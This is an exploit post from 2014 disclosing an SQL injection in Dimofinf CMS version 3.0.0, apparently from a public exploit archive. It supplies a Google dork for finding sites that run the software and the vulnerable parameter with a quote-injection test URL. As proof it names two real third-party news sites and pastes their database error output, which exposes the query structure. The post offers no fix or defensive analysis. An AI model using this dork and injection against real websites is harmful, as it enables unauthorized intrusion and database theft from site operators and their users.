facebook facebook twitter rss

Dimofinf cms Version 3.0.0 SQL Injection

Author: 7r9 al7Dod , Published: 18-05-2014
# Exploit Title: Dimofinf cms Version 3.0.0 SQL Injection
# Google Dork: intext:"Powered by Dimofinf cms Version 3.0.0"
# Date: [2014/5/18]
# Exploit Author: 7r9 al7Dod
# Vendor Homepage: https://www.dimofinf.net/
# Tested on: win&linux
# Greetz : Allah , OUT-l4w , all sudanese hacker


[~] VULNERABILITY}~~

[~] www.site.com/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'

[~] POC}~~
[~] ==1==

[~] http://www.alrakoba.net/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'
Database error in Dimofinf v3.0.0 :
***********************************
Invalid SQL:
SELECT id,caption FROM newsm WHERE date <= '1400403558' AND comnum != 0 AND id != 147733' AND round((UNIX_TIMESTAMP()-newsm.date)/86400)<=30 ORDER BY comnum DESC LIMIT 3,1;
***********************************
MySQL Error :
===================================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND round((UNIX_TIMESTAMP()-newsm.date)/86400)<=30 ORDER BY comnum DESC LIMIT ' at line 1
===================================
Error Number : 1064
Date :Sunday, May 18th 2014 04:59:18 AM
Script : http://www.alrakoba.net/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'
Referrer : REFERRER
IP Address : xx.xx.xx.xx
[~] ==2==
[~] http://www.alnilin.com/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'
Database error in Dimofinf v3.0.0 :
***********************************
Invalid SQL:
SELECT id,caption FROM newsm WHERE date <= '1400403892' AND comnum != 0 AND id != 147733' AND round((UNIX_TIMESTAMP()-newsm.date)/86400)<=30 ORDER BY comnum DESC LIMIT 3,1;
***********************************
MySQL Error :
===================================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND round((UNIX_TIMESTAMP()-newsm.date)/86400)<=30 ORDER BY comnum DESC LIMIT ' at line 1
===================================
Error Number : 1064
Date :Sunday, May 18th 2014 11:04:53 AM
Script : http://www.alnilin.com/blocks/extra/x-news-tmcomnt.php?extact=3|1|147733'
Referrer : REFERRER
IP Address : xx.xx.xx.xx



/-----------------www.sudaht.com--------------------\
|+------------------------------------------------+ |
|| 7r9 al7Dod & OUT-l4w | |
|| info@sudaht.com | |
|+------------------------------------------------+ |
\---------------------------------------------------/

Proud To be a Muslim

Like us on Facebook :